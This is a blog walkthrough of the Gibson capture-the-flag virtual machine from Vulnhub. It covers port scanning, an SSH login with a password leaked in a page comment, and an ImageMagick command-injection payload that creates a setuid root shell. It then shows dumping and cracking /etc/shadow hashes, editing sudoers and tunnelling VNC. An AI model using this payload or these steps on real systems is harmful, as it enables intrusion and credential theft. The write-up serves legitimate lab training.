Mr_H4sh

Infosec, CTF and more

Gibson Solution

In this post I’m going to show you how to solve the Gibson VM provided by Knightmare.

You can find the VM on this link

192.168.56.102 <== attacker
192.168.56.101 <== victim

I run nmap to check which services are running on the machine:

nmap -sV -p- -Pn -n -v 192.168.56.101 -oA 192.168.56.101_full_version_scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7
MAC Address: 08:00:27:5B:0C:58 (Oracle VirtualBox virtual NIC)
Service Info: Host: gibson.example.co.uk; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Ok, just two TCP ports open.

I have a look at the website at http://192.168.56.101:80 and this is what I find a link to http://192.168.56.101:80/davinci.html

So, I click the link and this is what I find a page that says: “The answer you seek will be found by brute force”.

So, if I understand well, he wants me to fuzz URLs…don’t fall in the trap! I check the source code of the page and this is what I find:

<html>
<title>Gibson Mining Corporation</title>
<body>
<!-- Damn it Margo! Stop setting your password to "god" -->
<!-- at least try and use a different one of the 4 most -->
<!-- common ones! (eugene) -->
<h1> The answer you seek will be found by brute force</h1>
</body>

Now, since I want to trust my friend “eugene” I try to ssh with the user margo and password god:

# ssh margo@192.168.56.101
Ubuntu 14.04.3 LTS
margo@192.168.56.101's password: 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic x86_64)



  System information as of Tue May 17 13:23:07 BST 2016

  System load: 0.0               Memory usage: 6%   Processes:       81
  Usage of /:  82.2% of 1.85GB   Swap usage:   0%   Users logged in: 0

  Graph this data and manage this system at:
    https://landscape.canonical.com/

margo@gibson:~$ whoami
margo
margo@gibson:~$ id
uid=1002(margo) gid=1002(margo) groups=1002(margo),27(sudo)

It would be wonderful if I found a sudoer, but no, margo is not a sudoer, although she (or he) can run just one command as sudoer:

margo@gibson:~$ sudo -l
Matching Defaults entries for margo on gibson:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User margo may run the following commands on gibson:
    (ALL) NOPASSWD: /usr/bin/convert
margo@gibson:~$ which convert
/usr/bin/convert

Uhm… I have a look at the passwd file:

margo@gibson:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:107::/var/run/dbus:/bin/false
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/bin/false
landscape:x:104:110::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
libvirt-qemu:x:106:106:Libvirt Qemu,,,:/var/lib/libvirt:/bin/false
libvirt-dnsmasq:x:107:111:Libvirt Dnsmasq,,,:/var/lib/libvirt/dnsmasq:/bin/false
duke:x:1000:1000:Duke Ellingson,,,:/home/duke:/bin/bash
colord:x:108:115:colord colour management daemon,,,:/var/lib/colord:/bin/false
eugene:x:1001:1001:Eugene Belford:/home/eugene:
margo:x:1002:1002:Margo Wallace:/home/margo:/bin/bash

I have a look if there’s any exploit for the convert command, and I find out about a ImageMagick exploit on this link At this point I write the following script to spawn a root shell setting the root SUID:

margo@gibson:~$ cat exploit.jpg 
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|cp /bin/sh myshell; chmod 4777 myshell")'
pop graphic-context

margo@gibson:~$ sudo /usr/bin/convert exploit.jpg exploit.png
chmod: cannot access myshell: No such file or directory
convert: unrecognized color `https://example.com/image.jpg"|cp /bin/sh myshell; chmod 4777 myshell"' @ warning/color.c/GetColorCompliance/947.
convert: unable to open image `/tmp/magick-KzaGfMI2': No such file or directory @ error/blob.c/OpenBlob/2638.
convert: unable to open file `/tmp/magick-KzaGfMI2': No such file or directory @ error/constitute.c/ReadImage/583.
convert: non-conforming drawing primitive definition `fill' @ error/draw.c/DrawImage/3158.

margo@gibson:~$ ls -l
-rw-rw-r-- 1 margo margo     146 May 17 18:46 exploit.jpg
-rw-r--r-- 1 root  root      421 May 17 18:46 exploit.png
-rwsrwxrwx 1 root  root   121272 May 17 18:46 myshell

margo@gibson:~$ margo@gibson:~$ ./myshell2 
# id
uid=1002(margo) gid=1002(margo) euid=0(root) groups=0(root),27(sudo),1002(margo)
# cat /etc/shadow
root:!:16921:0:99999:7:::
daemon:*:16652:0:99999:7:::
bin:*:16652:0:99999:7:::
sys:*:16652:0:99999:7:::
sync:*:16652:0:99999:7:::
games:*:16652:0:99999:7:::
man:*:16652:0:99999:7:::
lp:*:16652:0:99999:7:::
mail:*:16652:0:99999:7:::
news:*:16652:0:99999:7:::
uucp:*:16652:0:99999:7:::
proxy:*:16652:0:99999:7:::
www-data:*:16652:0:99999:7:::
backup:*:16652:0:99999:7:::
list:*:16652:0:99999:7:::
irc:*:16652:0:99999:7:::
gnats:*:16652:0:99999:7:::
nobody:*:16652:0:99999:7:::
libuuid:!:16652:0:99999:7:::
syslog:*:16652:0:99999:7:::
messagebus:*:16921:0:99999:7:::
dnsmasq:*:16921:0:99999:7:::
landscape:*:16921:0:99999:7:::
sshd:*:16921:0:99999:7:::
libvirt-qemu:!:16921:0:99999:7:::
libvirt-dnsmasq:!:16921:0:99999:7:::
duke:$6$xRLSRx7x$O.REaRUKj6zM.ZAYFBfZEfq.iyoiHKlpNCFlh9D8gQBfRdldL05vAxHmjuTgriKCetSADyWyLKvklZhcQp7mu1:16928:0:99999:7:::
colord:*:16922:0:99999:7:::
eugene:$6$UU15rhob$qZ5B2VjeCk9QIlxXS6QDf9MuxFpNkfAQTc3V3ny.57kLHLj1aOdLnmprfL53niAfztzGMLJqSZaS79sYY1X1a/:16928:0:99999:7:::
margo:$6$Nx0eYFUO$f99BzOSc/hBLbflCsV5912gdcNNUKRi/xGTz7xldbr402BQ367eN.GsCScejNNotaJg9oQPhqdzqq/DcHCKYD/:16928:0:99999:7:::

Sweet, I have a root shell and I got all the hashes of passwords of the users on this machine. I download the passwd and shadow files on my local machine, I unshadow them and I use John the Ripper to crack them:

root@kali:/media/sf_shared_folders/linux/pentest/gibson# unshadow passwd shadow > users_hashes
root@kali:/media/sf_shared_folders/linux/pentest/gibson# ls -l
total 24
-rwxrwx--- 1 root vboxsf  507 May 17 13:33 192.168.56.101_full_version_scan.gnmap
-rwxrwx--- 1 root vboxsf  761 May 17 13:33 192.168.56.101_full_version_scan.nmap
-rwxrwx--- 1 root vboxsf 2567 May 17 13:33 192.168.56.101_full_version_scan.xml
-rwxrwx--- 1 root vboxsf 1545 May 18 20:02 passwd
-rwxrwx--- 1 root vboxsf 1122 May 18 20:01 shadow
-rwxrwx--- 1 root vboxsf 1836 May 18 20:06 users_hashes

root@kali:/media/sf_shared_folders/linux/pentest/gibson# john -stdin users_hashes 
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press Ctrl-C to abort, or send SIGUSR1 to john process for status

It might take time, and it’s not even sure that I’ll crack them, so in the meantime I go and check if there’s anything else interesting on the server. After all, I’m root not ;) First thing, I prefer a bash shell more than a sh shell, so I add the user margo in the sudoers:

# vim /etc/sudoers

[...] 
# User privilege specification
root    ALL=(ALL:ALL) ALL
margo   ALL=(ALL:ALL) ALL
[...]

# su - margo
Password: 
margo@gibson:~$ sudo su
[sudo] password for margo: god
root@gibson:/home/margo# 

Sweet, now margo is a sudoer (a sudoer with god as password…) I discover that the server is connected to another subnet 192.168.122.x, and it has IP 192.168.122.1. I also discover that the server is listening on port 5900:

root@gibson:~# lsof -i
COMMAND    PID            USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
dhclient   529            root    6u  IPv4   9748      0t0  UDP *:bootpc 
dhclient   529            root   20u  IPv4   9682      0t0  UDP *:50353 
dhclient   529            root   21u  IPv6   9683      0t0  UDP *:12810 
sshd       946            root    3u  IPv4  10635      0t0  TCP *:ssh (LISTEN)
sshd       946            root    4u  IPv6  10637      0t0  TCP *:ssh (LISTEN)
apache2   1107            root    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1124        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1125        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1126        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1127        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
apache2   1128        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
dnsmasq   1237 libvirt-dnsmasq    4u  IPv4  11066      0t0  UDP *:bootps 
dnsmasq   1237 libvirt-dnsmasq    6u  IPv4  11069      0t0  UDP 192.168.122.1:domain 
dnsmasq   1237 libvirt-dnsmasq    7u  IPv4  11070      0t0  TCP 192.168.122.1:domain (LISTEN)
qemu-syst 1247    libvirt-qemu   10u  IPv4  11304      0t0  TCP localhost:5900 (LISTEN)
apache2   1343        www-data    4u  IPv6  10813      0t0  TCP *:http (LISTEN)
sshd      1901            root    3u  IPv4  25545      0t0  TCP 192.168.56.101:ssh->192.168.56.102:48998 (ESTABLISHED)
sshd      1990           margo    3u  IPv4  25545      0t0  TCP 192.168.56.101:ssh->192.168.56.102:48998 (ESTABLISHED)

root@gibson:~# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:domain
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:domain
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootps
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:bootps

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     all  --  anywhere             192.168.122.0/24     ctstate RELATED,ESTABLISHED
ACCEPT     all  --  192.168.122.0/24     anywhere            
ACCEPT     all  --  anywhere             anywhere            
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
ACCEPT     udp  --  anywhere             anywhere             udp dpt:bootpc

root@gibson:~# ps aux | grep qemu-syst
libvirt+  1247  0.5 14.6 841876 111356 ?       Sl   13:23   2:07 /usr/bin/qemu-system-x86_64 -name ftpserv -S -machine pc-i440fx-trusty,accel=tcg,usb=off -m 256 -realtime mlock=off -smp 1,sockets=1,cores=1,threads=1 -uuid ebcdaa6c-b10a-d758-c13a-0fb296b011f1 -no-user-config -nodefaults -chardev socket,id=charmonitor,path=/var/lib/libvirt/qemu/ftpserv.monitor,server,nowait -mon chardev=charmonitor,id=monitor,mode=control -rtc base=utc -no-shutdown -boot strict=on -device piix3-usb-uhci,id=usb,bus=pci.0,addr=0x1.0x2 -drive file=/var/lib/libvirt/images/ftpserv.img,if=none,id=drive-ide0-0-0,format=raw -device ide-hd,bus=ide.0,unit=0,drive=drive-ide0-0-0,id=ide0-0-0,bootindex=2 -drive if=none,id=drive-ide0-1-0,readonly=on,format=raw -device ide-cd,bus=ide.1,unit=0,drive=drive-ide0-1-0,id=ide0-1-0,bootindex=1 -netdev tap,fd=23,id=hostnet0 -device rtl8139,netdev=hostnet0,id=net0,mac=52:54:00:72:e2:fb,bus=pci.0,addr=0x3 -chardev pty,id=charserial0 -device isa-serial,chardev=charserial0,id=serial0 -vnc 127.0.0.1:0 -device cirrus-vga,id=video0,bus=pci.0,addr=0x2 -device intel-hda,id=sound0,bus=pci.0,addr=0x4 -device hda-duplex,id=sound0-codec0,bus=sound0.0,cad=0 -device virtio-balloon-pci,id=balloon0,bus=pci.0,addr=0x5
root      3166  0.0  0.2  11756  2256 pts/3    S+   20:04   0:00 grep --color=auto qemu-syst

Looks like that a VM is running onto the server, and the image is located on /var/lib/libvirt/images/ftpserv.img. So, I create a port forwarding from the server to my local machine to connect on VNC on the VM into the server:

# ON THE SERVER
root@gibson:~# ssh root@192.168.56.102 -R 1111:localhost:5900 -N
The authenticity of host '192.168.56.102 (192.168.56.102)' can't be established.
ECDSA key fingerprint is b2:bf:20:bb:1a:e7:2e:bc:e0:26:1d:fb:f1:c8:7e:46.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.102' (ECDSA) to the list of known hosts.
root@192.168.56.102's password: 
Permission denied, please try again.
root@192.168.56.102's password: 

root@gibson:~# ssh root@192.168.56.102 -R 1111:localhost:5900 -N


# ON MY LOCAL MACHINE
root@kali:/media/sf_shared_folders/linux/pentest/gibson# vncviewer localhost:1111
Connected to RFB server, using protocol version 3.8
No authentication needed
Authentication successful
Desktop name "QEMU (ftpserv)"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

Once connected a terminal appears. I wonder around and I find a folder called GARBAGE (since I watched Hackers I have a feeling that I’m on the right way). I get the files from that folder to my local to inspect them. The files are 3:

root@kali:/media/sf_shared_folders/linux/pentest/gibson/GARBAGE# ls -l
total 164
-rwxrwx--- 1 root vboxsf 73185 May 17 21:11 ADMINSPO.JPG
-rwxrwx--- 1 root vboxsf 87902 May 17 21:15 FLAG.IMG
-rwxrwx--- 1 root vboxsf  1577 May 19 13:43 JZ_UG.ANS

All the files that I inspect are corrupted, so I download the image of the VM running on the server and I mount it on my computer:

root@kali:/media/root/KFYLNN1/GARBAGE# ls -l
total 856
-rw-r--r-- 1 root root 123141 May  4 22:17 adminspo.jpg
-rw-r--r-- 1 root root 737280 May 14 14:19 flag.img
-rw-r--r-- 1 root root   1601 Jun 11  2002 jz_ug.ans

root@kali:/media/root/KFYLNN1/GARBAGE# exif adminspo.jpg 
EXIF tags in 'ADMINSPO.JPG' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag                 |Value
--------------------+----------------------------------------------------------
Image Description   |Rabbit.. Flu Shot... TYPE COOKE YOU IDIOT! I'll head them 
Date and Time       |2016:05:04 22:29:32
Artist              |Virtualization is fun.. What's more, esoteric OSes on 192.
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |Inch
User Comment        |So there's info here.... Images, hmm... Wasn't that a CVE.
Exif Version        |Exif Version 2.1
FlashPixVersion     |FlashPix Version 1.0
Colour Space        |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------

root@kali:/media/root/KFYLNN1/GARBAGE# cat jz_ug.ans

    �����������������������������������������������������۲���������������
    �������������������������۲���������� ��������۲�����۲���������������
    ���������������������������������������������������� �����������������
    ޲���������۲�����۲�����������    �����۲���    ����������߲������۲�
     ��߱� ����������߲����������߲    �����߲���    ����߲���߲��ݲ����߲jz
                                  �                            �         �
                    the ugliest of all are under 5 feet tall

root@kali:/media/root/KFYLNN1/GARBAGE# file flag.img
flag.img: Linux rev 1.0 ext2 filesystem data, UUID=d59bdd40-ec37-4d24-a956-80f549846121

I mount the partition flag.img and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 70
drwxr-xr-x  4 root root  1024 May 14 14:07 .
drwxr-x---+ 5 root root  4096 May 19 14:55 ..
-rwxrwxr-x  1 root root 21358 Nov 16  2011 davinci
-rw-r--r--  1 root root 28030 Nov 16  2011 davinci.c
-rw-r--r--  1 root root   159 May  5 19:56 hint.txt
drwx------  2 root root 12288 May  5 19:39 lost+found
drwxr-xr-x  2 root root  1024 May  5 20:07 .trash

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cd .trash
root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# ls -la
total 319
drwxr-xr-x 2 root root   1024 May  5 20:07 .
drwxr-xr-x 4 root root   1024 May 14 14:07 ..
---x------ 1 root root    469 May 14 14:18 flag.txt.gpg
-rw-r--r-- 1 root root 320130 Sep  7  2015 LeithCentralStation.jpg

I check the hint.txt file and this is what I find:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121# cat hint.txt 
http://www.imdb.com/title/tt0117951/ and
http://www.imdb.com/title/tt0113243/ have
someone in common... Can you remember his
original nom de plume in 1988...?

The only person these two Films have in common is Jonny Lee Miller. I check his Wikipedia page and I see that his nom de plume (or nickname) was Zero Cool. I try to decrypt the file flag.txt.gpg using the passphrase zerocool, but it doesn’t work. After various attempts, I create a wordlist with the all the possible combinations of the word zerocool, and at the end the right passphrase is Z3r0K00l:

root@kali:/media/root/d59bdd40-ec37-4d24-a956-80f549846121/.trash# gpg --decrypt flag.txt.gpg 
gpg: CAST5 encrypted data
gpg: encrypted with 1 passphrase
 _   _            _      _____ _             ____  _                  _   _
| | | | __ _  ___| | __ |_   _| |__   ___   |  _ \| | __ _ _ __   ___| |_| |
| |_| |/ _` |/ __| |/ /   | | | '_ \ / _ \  | |_) | |/ _` | '_ \ / _ \ __| |
|  _  | (_| | (__|   <    | | | | | |  __/  |  __/| | (_| | | | |  __/ |_|_|
|_| |_|\__,_|\___|_|\_\   |_| |_| |_|\___|  |_|   |_|\__,_|_| |_|\___|\__(_)


Should you not be standing in a 360 degree rotating payphone when reading
this flag...? B-)

Anyhow, congratulations once more on rooting this VM. This time things were
a bit esoteric, but I hope you enjoyed it all the same.

Shout-outs again to #vulnhub for hosting a great learning tool. A special
thanks goes to g0blin and GKNSB for testing, and to g0tM1lk for the offer
to host the CTF once more.
                                                              --Knightmare
gpg: WARNING: message was not integrity protected

Nice one, it was very original, I loved it. Thank you to Knightmare for the VM and Vulnhub for hosting it. For any information or comment, please do not hesitate to leave a comment.